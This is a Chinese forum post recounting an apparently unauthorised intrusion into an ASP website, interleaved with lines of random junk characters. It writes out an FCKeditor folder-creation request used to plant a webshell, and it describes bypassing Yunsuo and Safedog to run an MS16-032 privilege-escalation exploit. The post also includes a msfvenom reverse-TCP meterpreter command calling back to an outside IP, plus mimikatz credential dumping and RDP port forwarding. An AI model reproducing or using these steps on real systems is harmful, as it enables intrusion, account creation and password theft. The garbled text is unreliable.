|
/ B) t0 ~* e* h& W: A C% \3 l* X, b * Q) G ^/ `. }
# [! e# v$ Z9 n9 [
8 `- \) ]' w8 X! o' ^
|
, l6 Q* X; E& B- e
& a, K6 v3 o1 ^
. C' q, j; g! j' G |6 b2 p一、 利用getwebshell篇
[, ]' K0 s/ A8 P
% [9 ]; B& w' x' L. r9 |4 k首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
3 ?* i' Y/ Q- b# T6 `
( s, z3 t6 e1 M
( @7 w7 i: T3 t; P0 u下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
2 h* J: k$ h: Z- A- D
4 [) _( Q+ n+ V. ~
下面我们构造一个asp目录,如: - ?! g' O7 ^+ ]
z1 t. p0 g; l. C7 D7 T8 k r
/ t) h r8 K- N9 W http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
7 ^9 U5 R- B# B3 I. x: ? $ o% q5 h0 X5 g+ K
1 I) l# ?4 B3 W, v, ~# p1 o 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
1 g# ?1 F" ~5 r# r# p8 s
( X; q5 D$ A( t2 ?" g
一、 绕过安全狗云锁提权并且加账号
" Y9 @8 \1 e+ j2 n
7 X' s' r- ]* e7 f& j; @' }没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
: v4 k# w1 v9 \& q3 [, _6 k
% c$ f t- R4 ~, A( i2 V* E如图:
s. j7 d1 ~+ w: g
/ `" ~0 y8 ^. U" m( t, R& |
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
! i, s% o: I+ ~+ S
) a2 L8 S- c0 b( p一、 利用metasploit
0 W" e% S8 h( k2 @# g
5 p6 p; z) f( I3 x# {首先用pentestbox生成一个64位的payload如下命令
1 K+ H5 I' T; _% k/ ?' |3 p
: i9 K* @, ]( E5 _0 a+ {
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
v0 A+ q5 Z0 I
$ M3 `4 u8 \+ s! {$ a/ `
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
8 X7 s: t& Q8 L+ @% \, R
1 {: c# a( @$ y% I" s; j/ {下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
' {0 n3 }0 N6 ^9 G. g
% h; N/ e5 r8 [( ?2 X0 d下面我们来做一个监听如下命令:
* T c V5 p$ e" M
" k/ I( n# Y) I$ J' g/ d5 p% [
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
9 q+ B3 V# Y+ C; Q: O
 3 A( u+ Y/ T$ ^ U& R! N" H ^
8 L2 n; q8 H4 t U& z2 w6 T3 i | h6 i# p0 J3 l! O8 F
: K3 R. u9 ?9 }
- h. n, T0 r/ Y* J
; d5 @/ r2 b% I# x
+ I# t& k0 J7 v$ b+ M
4 M6 X) l$ p. ]; |( d8 V) b5 j
0 p3 A. v2 Q# ?; _2 P
' N- J9 D% v. b1 K: W/ @, F
3 k6 W5 e. H0 n ! }8 O" R0 z! J0 _) ]: \' G, ?
3 H# B4 C2 Z8 Y0 d( o
3 v8 K% ~ O/ N( x, V' F% j# r; _) z
' K y0 m) r% H | 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06